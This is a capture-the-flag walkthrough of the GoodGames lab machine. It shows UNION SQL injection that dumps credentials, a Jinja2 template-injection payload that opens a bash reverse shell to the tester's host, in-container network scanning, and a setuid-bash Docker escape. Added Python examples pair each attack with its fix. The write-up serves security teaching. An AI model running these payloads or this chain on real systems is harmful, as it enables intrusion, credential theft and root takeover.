Key points
1. SQL injection
2. Server-side template injection (SSTI)
3. Docker escape (how to do host discovery and port scanning when the container has no nmap or similar tooling)
4. setuid privilege escalation
Writeup
A standard nmap scan finds only an HTTP service on port 80:
┌──(root💀192)-[/home/kali]
└─# nmap -sC -sV 10.10.11.130
Starting Nmap 7.91 ( https://nmap.org ) at 2023-03-14 13:41 CST
Nmap scan report for 10.10.11.130
Host is up (0.28s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open ssl/http Werkzeug/2.0.2 Python/3.9.2
|_http-server-header: Werkzeug/2.0.2 Python/3.9.2
|_http-title: GoodGames | Community and Store
Browsing to the site, this is a fairly flashy homepage as boxes go.
Directory brute-forcing fails: gobuster bails out because the server answers 200 with the same 9265-byte body for a random non-existent path, so every guess would look like a hit. The options are to exclude that length (--exclude-length 9265) or, better, to find the real domain first and brute-force against the virtual host. Clicking around a page sometimes leaks the domain in a redirect, but that did not work here.
┌──(root💀192)-[/home/kali]
└─# gobuster dir -u http://10.10.11.130/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 20 -r -b 302
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.11.130/
[+] Method: GET
[+] Threads: 20
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 302
[+] User Agent: gobuster/3.5
[+] Follow Redirect: true
[+] Timeout: 10s
===============================================================
2023/03/14 13:46:48 Starting gobuster in directory enumeration mode
===============================================================
Error: the server returns a status code that matches the provided options for non existing urls. http://10.10.11.130/a25fddfa-faea-46d6-ae07-5fe9921fbcd7 => 200 (Length: 9265). To continue please exclude the status code or the length
Scrolling to the bottom of the page reveals the domain GoodGames.HTB.
Registering an account and logging in works normally, so we capture the login request and test it for SQL injection.
The injected login lands us straight in the admin account.
Pasting the HTTP request into sqlmap gives nothing, so we fall back to manual injection.
A UNION with four columns works, and the fourth column is the one reflected in the page:
email=a'UNION SELECT 1,2,3,4 -- -&password=
The current database is named main.
Listing the tables in the current database gives three: blog, blog_comment and user:
email=a'UNION SELECT 1,2,3,concat(table_name,'$') from INFORMATION_SCHEMA.TABLES where table_schema=database() -- -&password=
If the page reflects only one row, group_concat(table_name) in the fourth column returns every table name in a single row.
Dumping the structure of the user table shows the columns email, id, name and password:
email=a'UNION SELECT 1,2,3,concat(column_name,'$') from INFORMATION_SCHEMA.COLUMNS where table_name="user" -- -&password=
Filtering on table_name alone matches a table called user in any schema; adding and table_schema=database() keeps other databases out of the listing.
Dump the table contents:
email=a'UNION SELECT 1,2,3,concat(name,'\n',password) from user limit 10 -- -&password=
This yields the password: superadministrator.
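To make the union technique concrete, here is an added example (not code from the writeup or the GoodGames application) that rebuilds the same attack against a throwaway SQLite database: a login query that pastes the email field into the SQL string, the four-column UNION probe, schema enumeration, and the credential dump. The table contents are constructed; sqlite_master stands in for INFORMATION_SCHEMA and || for concat(), since SQLite has neither. The parameterised version shows why the same payload then matches nothing:

```python
import sqlite3

# Constructed stand-in for the box's "main" database: same table and column
# names as the writeup found, but the rows are made up for this example.
SCHEMA = """
CREATE TABLE user (id INTEGER, email TEXT, password TEXT, name TEXT);
CREATE TABLE blog (id INTEGER, title TEXT);
CREATE TABLE blog_comment (id INTEGER, body TEXT);
INSERT INTO user VALUES (1, 'admin@goodgames.htb', 'superadministrator', 'admin');
INSERT INTO user VALUES (2, 'bob@goodgames.htb', 'hunter2', 'bob');
"""


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def login_vulnerable(conn, email, password):
    """The bug class behind the login form: request fields are spliced into
    the SQL text, so a quote in `email` ends the literal and the rest of the
    input becomes SQL. The app reflects column 4 (name) of the rows returned."""
    sql = ("SELECT id, email, password, name FROM user "
           f"WHERE email='{email}' AND password='{password}'")
    return conn.execute(sql).fetchall()


def login_safe(conn, email, password):
    """Parameterised query: the same payload is just an odd email string."""
    sql = "SELECT id, email, password, name FROM user WHERE email=? AND password=?"
    return conn.execute(sql, (email, password)).fetchall()


def reflected(conn, injected_email):
    """What the attacker sees: the reflected 4th column of every returned row
    (the writeup sends the payload in `email` and leaves `password` empty)."""
    return [row[3] for row in login_vulnerable(conn, injected_email, "")]


def run_attack(conn):
    # Step 1: confirm four columns and find the reflected one (the 1,2,3,4 probe)
    probe = reflected(conn, "a' UNION SELECT 1,2,3,4 -- -")
    assert probe == [4], "column count or reflection point differs"
    # Step 2: table names. sqlite_master replaces INFORMATION_SCHEMA.TABLES.
    tables = reflected(
        conn, "a' UNION SELECT 1,2,3,name FROM sqlite_master WHERE type='table' -- -")
    # Step 3: column names. The stored CREATE statement replaces INFORMATION_SCHEMA.COLUMNS.
    user_ddl = reflected(
        conn, "a' UNION SELECT 1,2,3,sql FROM sqlite_master WHERE name='user' -- -")[0]
    # Step 4: dump credentials; || is SQLite's string concatenation.
    creds = reflected(
        conn, "a' UNION SELECT 1,2,3,name||':'||password FROM user -- -")
    return {"tables": sorted(tables), "user_ddl": user_ddl, "creds": creds}


if __name__ == "__main__":
    db = open_db()
    for key, value in run_attack(db).items():
        print(key, value)
    # The identical payload against the parameterised query matches nothing.
    print("safe:", login_safe(db, "a' UNION SELECT 1,2,3,4 -- -", ""))
```

The payloads carry a space before UNION for readability; MySQL, as on the box, accepts the writeup's a'UNION form as well.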
We don't yet know where this password is useful, so we keep looking at the page. The settings button in the top right redirects to a subdomain, http://internal-administration.goodgames.htb/; add it to the hosts file.
It is a Flask login page, so try the username and password we just recovered.
That logs us into the backend. It is built on the Volt admin template and is again Flask, so server-side template injection has to be tested; we need an input that is reflected back, and the settings page is one.
The template injection test succeeds.
The process turns out to be running as root. The payload below works because namespace is a Jinja2 built-in (jinja2.utils.Namespace); its __init__.__globals__ is the module namespace of jinja2.utils, which imports os:
{{ namespace.__init__.__globals__.os.popen('id').read() }}
Now get a reverse shell back:
{{namespace.__init__.__globals__.os.popen('bash -c "bash -i >& /dev/tcp/10.10.14.4/1234 0>&1"').read()}}
root@3a453ab39d3d:/home/augustus# cat user.txt
cat user.txt
650fb0d7e814c6cf6bddbd94207cd90f
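The Jinja2 mechanics behind that payload, as an added example that is not from the writeup or the target application. It assumes jinja2 is installed (it is the engine Flask uses) and replaces id with a fixed echo so the result is predictable. The vulnerable pattern is user text being compiled as the template source; the sandboxed environment refuses the dunder walk, and the real fix is passing user data in as context:

```python
import jinja2
from jinja2.exceptions import SecurityError
from jinja2.sandbox import SandboxedEnvironment

# The writeup's payload with `id` swapped for a fixed echo so the result is
# predictable. `namespace` is jinja2.utils.Namespace, exposed to every template;
# its __init__.__globals__ is the jinja2.utils module dict, which imports os.
PAYLOAD = "{{ namespace.__init__.__globals__.os.popen('echo pwned').read() }}"


def render_unsandboxed(user_input):
    """The vulnerable shape: user text becomes the template *source*, e.g.
    render_template_string(f'<h1>{name}</h1>') in a Flask view."""
    return jinja2.Environment().from_string(user_input).render()


def render_sandboxed(user_input):
    """Same mistake behind SandboxedEnvironment: attribute names starting
    with an underscore are refused, so the __init__/__globals__ walk dies."""
    try:
        return SandboxedEnvironment().from_string(user_input).render()
    except SecurityError as exc:
        return f"blocked: {exc}"


def render_fixed(template_source, user_input):
    """The real fix: a fixed template, user data supplied as context and
    autoescaped. The payload comes back as inert text."""
    env = jinja2.Environment(autoescape=True)
    return env.from_string(template_source).render(name=user_input)


if __name__ == "__main__":
    print(repr(render_unsandboxed(PAYLOAD)))
    print(repr(render_sandboxed(PAYLOAD)))
    print(repr(render_fixed("Hello {{ name }}", PAYLOAD)))
```

The sandbox is a mitigation, not the fix: it still lets an attacker author templates and has had bypasses in the past, so the settings field should never reach from_string at all.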
The reverse shell is unstable, so upgrade it to a proper TTY:
root@3a453ab39d3d:/backend# script /dev/null -c bash
script /dev/null -c bash
Script started, file is /dev/null
root@3a453ab39d3d:/backend# ^Z
zsh: suspended nc -lvvp 1234
┌──(root💀192)-[/home/kali]
└─# stty raw -echo; fg
[1] + continued nc -lvvp 1234
root@3a453ab39d3d:/backend#
Going to the root directory to read the flag, there is no flag there, so this is not the end of it.
root@3a453ab39d3d:/backend# cat /root/root.txt
cat: /root/root.txt: No such file or directory
root@3a453ab39d3d:/backend# cd /root
root@3a453ab39d3d:~# ls
root@3a453ab39d3d:~#
Running ls -al / shows a .dockerenv file, which confirms we are inside a Docker container and need to escape to the host:
root@3a453ab39d3d:~# ls -al /
total 88
drwxr-xr-x 1 root root 4096 Nov 5 2021 .
drwxr-xr-x 1 root root 4096 Nov 5 2021 ..
-rwxr-xr-x 1 root root 0 Nov 5 2021 .dockerenv
drwxr-xr-x 1 root root 4096 Nov 5 2021 backend
drwxr-xr-x 1 root root 4096 Nov 5 2021 bin
drwxr-xr-x 2 root root 4096 Oct 20 2018 boot
drwxr-xr-x 5 root root 340 Mar 14 02:49 dev
drwxr-xr-x 1 root root 4096 Nov 5 2021 etc
drwxr-xr-x 1 root root 4096 Nov 5 2021 home
drwxr-xr-x 1 root root 4096 Nov 16 2018 lib
drwxr-xr-x 2 root root 4096 Nov 12 2018 lib64
drwxr-xr-x 2 root root 4096 Nov 12 2018 media
drwxr-xr-x 2 root root 4096 Nov 12 2018 mnt
drwxr-xr-x 2 root root 4096 Nov 12 2018 opt
dr-xr-xr-x 196 root root 0 Mar 14 02:49 proc
drwx------ 1 root root 4096 Mar 14 04:40 root
drwxr-xr-x 3 root root 4096 Nov 12 2018 run
drwxr-xr-x 1 root root 4096 Nov 5 2021 sbin
drwxr-xr-x 2 root root 4096 Nov 12 2018 srv
dr-xr-xr-x 13 root root 0 Mar 14 02:49 sys
drwxrwxrwt 1 root root 4096 Nov 5 2021 tmp
drwxr-xr-x 1 root root 4096 Nov 12 2018 usr
drwxr-xr-x 1 root root 4096 Nov 12 2018 var
There is no nmap in the container, so sweep the neighbouring addresses from here. The interface sits on 172.19.0.0/16, but Docker hands out addresses from the bottom of the range, so pinging 172.19.0.1-254 is enough:
root@3a453ab39d3d:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.19.0.2 netmask 255.255.0.0 broadcast 172.19.255.255
ether 02:42:ac:13:00:02 txqueuelen 0 (Ethernet)
RX packets 13659 bytes 3073446 (2.9 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 11577 bytes 7978216 (7.6 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
loop txqueuelen 1000 (Local Loopback)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
for i in {1..254}; do (ping -c 1 172.19.0.${i} | grep "bytes from" | grep -v "Unreachable" &); done;
64 bytes from 172.19.0.1: icmp_seq=1 ttl=64 time=0.111 ms
64 bytes from 172.19.0.2: icmp_seq=1 ttl=64 time=0.075 ms
# port scan using bash's built-in /dev/tcp (a full TCP connect per port; slow, but needs no tools)
for port in {1..65535}; do echo > /dev/tcp/172.19.0.1/$port && echo "$port open"; done 2>/dev/null
22 open
80 open
172.19.0.1 is alive; on a Docker bridge network .1 is the gateway address, which is the host itself. A port scan of it shows 22 and 80 open.
Try the recovered credentials, augustus:superadministrator, against SSH on the host (password reuse):
root@3a453ab39d3d:/home# ssh augustus@172.19.0.1
augustus@172.19.0.1's password:
Linux GoodGames 4.19.0-18-amd64 #1 SMP Debian 4.19.208-1 (2021-09-29) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Mar 14 04:47:25 2023 from 172.19.0.2
augustus@GoodGames:~$ sudo -l
-bash: sudo: command not found
augustus@GoodGames:~$ find / -user root -perm /4000 2>/dev/null
/home/augustus/bash
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/fusermount
/usr/bin/umount
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/mount
/usr/bin/su
augustus@GoodGames:~$ cd /home
augustus@GoodGames:/home$ ls
augustus
augustus@GoodGames:/home$ cd augustus/
augustus@GoodGames:~$ ls
bash test user.txt
Creating a test file from inside the container and changing its mode, the mode of the same file as seen from the host changes too, so /home/augustus is a volume bind-mounted from the host into the container:
root@3a453ab39d3d:/home/augustus# touch mytest
root@3a453ab39d3d:/home/augustus# ls -al mytest
-rw-r--r-- 1 root root 0 Mar 14 08:08 mytest
# switch to the host and check the permissions
augustus@GoodGames:~$ ls -al
total 1236
drwxr-xr-x 3 augustus augustus 4096 Mar 14 08:08 .
drwxr-xr-x 3 root root 4096 Oct 19 2021 ..
-rwsrwxrwx 1 root root 1234376 Mar 14 04:55 bash
lrwxrwxrwx 1 root root 9 Nov 3 2021 .bash_history -> /dev/null
-rw-r--r-- 1 augustus augustus 220 Oct 19 2021 .bash_logout
-rw-r--r-- 1 augustus augustus 3526 Oct 19 2021 .bashrc
drwx------ 3 augustus augustus 4096 Mar 14 04:50 .gnupg
-rwSr--r-- 1 root root 0 Mar 14 08:08 mytest
-rw-r--r-- 1 augustus augustus 807 Oct 19 2021 .profile
-rw-r--r-- 1 root root 0 Mar 14 04:53 test
-rw-r----- 1 root augustus 33 Mar 14 02:49 user.txt
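A quicker way to spot that shared directory than experimenting with chmod is to read the container's /proc/self/mountinfo: a mount backed by a host block device (rather than overlay, proc, tmpfs and so on) is a host path, and if it is not mounted nosuid the setuid trick will work on it. The parser below is an added example, not from the writeup; the mountinfo excerpt is constructed to resemble a container like this one, not captured from the box:

```python
import re

# Constructed /proc/self/mountinfo excerpt in the shape of a container like the
# one on this box: overlay root, kernel pseudo-filesystems, and paths bind-
# mounted from the host's root disk. Not captured from the target.
SAMPLE_MOUNTINFO = """\
1214 1196 0:68 / / rw,relatime - overlay overlay rw,lowerdir=/var/lib/docker/overlay2/l/AAA:/var/lib/docker/overlay2/l/BBB,upperdir=/var/lib/docker/overlay2/x/diff,workdir=/var/lib/docker/overlay2/x/work
1215 1214 0:71 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw
1216 1214 0:72 / /dev rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
1217 1214 0:73 / /sys ro,nosuid,nodev,noexec,relatime - sysfs sysfs ro
1218 1214 8:1 /home/augustus /home/augustus rw,relatime - ext4 /dev/sda1 rw,errors=remount-ro
1219 1214 8:1 /var/lib/docker/containers/abcd/resolv.conf /etc/resolv.conf rw,relatime - ext4 /dev/sda1 rw,errors=remount-ro
1220 1214 8:1 /opt/shared\\040dir /mnt/shared rw,nosuid,relatime - ext4 /dev/sda1 rw
"""

PSEUDO_FS = {"overlay", "proc", "sysfs", "tmpfs", "devpts", "mqueue",
             "cgroup", "cgroup2", "devtmpfs", "shm"}


def _unescape(field):
    """mountinfo encodes space, tab, newline and backslash as octal (\\040 etc.)."""
    return re.sub(r"\\([0-7]{3})", lambda m: chr(int(m.group(1), 8)), field)


def parse_mountinfo(text):
    """Parse the fixed fields of /proc/self/mountinfo. The optional fields
    between the options and the ' - ' separator vary in number, so split on
    the separator rather than by position."""
    mounts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        left, _, right = line.partition(" - ")
        lf, rf = left.split(), right.split()
        mounts.append({
            "root": _unescape(lf[3]),          # path inside the source filesystem
            "mount_point": _unescape(lf[4]),   # path inside the container
            "options": lf[5].split(","),
            "fstype": rf[0],
            "source": _unescape(rf[1]),
        })
    return mounts


def host_backed(mounts):
    """Mounts whose backing store is a host block device: files written here,
    including mode bits such as setuid, land on the host's own filesystem."""
    return [m for m in mounts
            if m["fstype"] not in PSEUDO_FS and m["source"].startswith("/dev/")]


def setuid_usable(mount):
    """A setuid binary only takes effect on execution if the mount is not nosuid."""
    return "nosuid" not in mount["options"]


def escape_candidates(text):
    """Host-backed mounts where a setuid bit set from the container would be
    honoured; `root` is where the directory lives on the host's device."""
    return [(m["mount_point"], m["root"])
            for m in host_backed(parse_mountinfo(text)) if setuid_usable(m)]


if __name__ == "__main__":
    try:
        text = open("/proc/self/mountinfo").read()   # live data on Linux
    except OSError:
        text = SAMPLE_MOUNTINFO
    for mount_point, root in escape_candidates(text):
        print(f"{mount_point} <- host path {root}")
```

The root field is relative to the device's own mount point, so it equals the host path only when that device is mounted at / on the host, as /dev/sda1 is in the sample.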
So put a copy of bash in the shared directory and, from the container side (where we are root), chown it to root and set the setuid bit (chmod u+s bash). On the host, run ./bash -p: the -p flag stops bash from dropping its effective uid back to the real uid, so the shell stays root. This only works because the volume is not mounted nosuid, so the host kernel honours the setuid bit on execution:
augustus@GoodGames:~$ ./bash -p
bash-5.1# whoami
root
bash-5.1# cat /root/root.txt
8c3edc1cbe6d1e9185a2ac3ac6c3c5ea
bash-5.1#